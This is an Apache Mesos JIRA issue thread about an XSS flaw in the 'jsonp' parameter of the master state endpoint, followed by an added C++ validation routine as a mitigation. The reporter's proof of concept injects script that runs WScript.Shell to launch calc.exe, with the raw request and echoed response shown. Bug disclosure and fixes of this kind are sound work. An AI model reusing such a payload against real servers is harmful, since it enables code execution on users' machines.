Posted to issues@mesos.apache.org by "Alexander Rojas (JIRA)" <ji...@apache.org> on 2017/11/13 23:00:03 UTC

[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

    [ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250448#comment-16250448 ] 

Alexander Rojas commented on MESOS-7826:
----------------------------------------

For backwards compatibility, I think it will be a while before we can completely remove the {{jsonp}} parameter from our codebase; however, that doesn't mean we cannot mitigate the problem of the possible attacks by properly treating the {{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably check that {{jsonp}} is just a JS identifier. Apparently just Internet Explorer up to version 11 is vulnerable to this attack.

> XSS in JSONP parameter
> ----------------------
>
>                 Key: MESOS-7826
>                 URL: https://issues.apache.org/jira/browse/MESOS-7826
>             Project: Mesos
>          Issue Type: Bug
>          Components: json api
>         Environment: Running as part of DC/OS in a docker container.
>            Reporter: Vincent Ruijter
>            Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into account the following url: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing the file (state.js), it will pop-up a calculator. It's my recommendation to apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
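The mitigation discussed in the comment above, shown as an added example that is not Mesos's own code and not the fix that was eventually committed: validate the {{jsonp}} value as a plain ASCII JavaScript identifier before echoing it, and fall back to a plain JSON response when no callback is given. The function names ({{isJsIdentifier}}, {{wrapJsonp}}), the reserved-word list and the length cap are assumptions made for this example; the Mesos handler itself only does {{OK(_flags(), request.url.query.get("jsonp"))}} as quoted above.

```cpp
// Added example, not Mesos code: reject anything in the `jsonp` query
// parameter that is not a bare JavaScript identifier, so attacker-supplied
// statements can never be prepended to the JSON body of a text/javascript
// response.
#include <cctype>
#include <cstddef>
#include <set>
#include <string>

// Assumed upper bound on a callback name; real JSONP callbacks are short.
static const std::size_t kMaxCallbackLength = 128;

// Syntactically valid identifiers that must still be rejected. Assumed list
// (ES5 reserved words plus a few global literals), not from the project.
static const std::set<std::string> kReservedWords = {
  "break", "case", "catch", "class", "const", "continue", "debugger",
  "default", "delete", "do", "else", "enum", "export", "extends", "false",
  "finally", "for", "function", "if", "import", "in", "instanceof", "new",
  "null", "return", "super", "switch", "this", "throw", "true", "try",
  "typeof", "var", "void", "while", "with", "yield", "let", "static",
  "undefined", "NaN", "Infinity"
};

static bool isIdentifierStart(unsigned char c) {
  return std::isalpha(c) || c == '_' || c == '$';
}

static bool isIdentifierPart(unsigned char c) {
  return std::isalnum(c) || c == '_' || c == '$';
}

// True iff `s` matches [A-Za-z_$][A-Za-z0-9_$]*, is within the length cap,
// and is not a reserved word. Dotted member paths such as "jQuery.cb" are
// deliberately rejected: the comment above asks for a single identifier.
bool isJsIdentifier(const std::string& s) {
  if (s.empty() || s.size() > kMaxCallbackLength) return false;
  if (!isIdentifierStart(static_cast<unsigned char>(s[0]))) return false;
  for (std::size_t i = 1; i < s.size(); ++i) {
    if (!isIdentifierPart(static_cast<unsigned char>(s[i]))) return false;
  }
  return kReservedWords.count(s) == 0;
}

struct JsonpResult {
  bool ok;                  // false => the caller should answer 400 Bad Request
  std::string body;
  std::string contentType;
};

// Builds the response for a JSON payload and an optional callback name,
// the way a hardened handler would after validating the parameter.
JsonpResult wrapJsonp(const std::string& json, const std::string& callback) {
  if (callback.empty()) {
    // No callback requested: serve plain JSON, not JavaScript.
    return {true, json, "application/json"};
  }
  if (!isJsIdentifier(callback)) {
    // Refuse rather than "sanitise": there is no safe partial echo here.
    return {false, "", ""};
  }
  // Only a validated identifier reaches the response text.
  return {true, callback + "(" + json + ");", "text/javascript"};
}
```

Running the reporter's payload ({{var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);}}) through {{wrapJsonp}} yields {{ok == false}}, so the handler would answer 400 instead of the 200 {{text/javascript}} response shown in the issue; a normal callback such as {{cb}} still produces {{cb({...});}} as before.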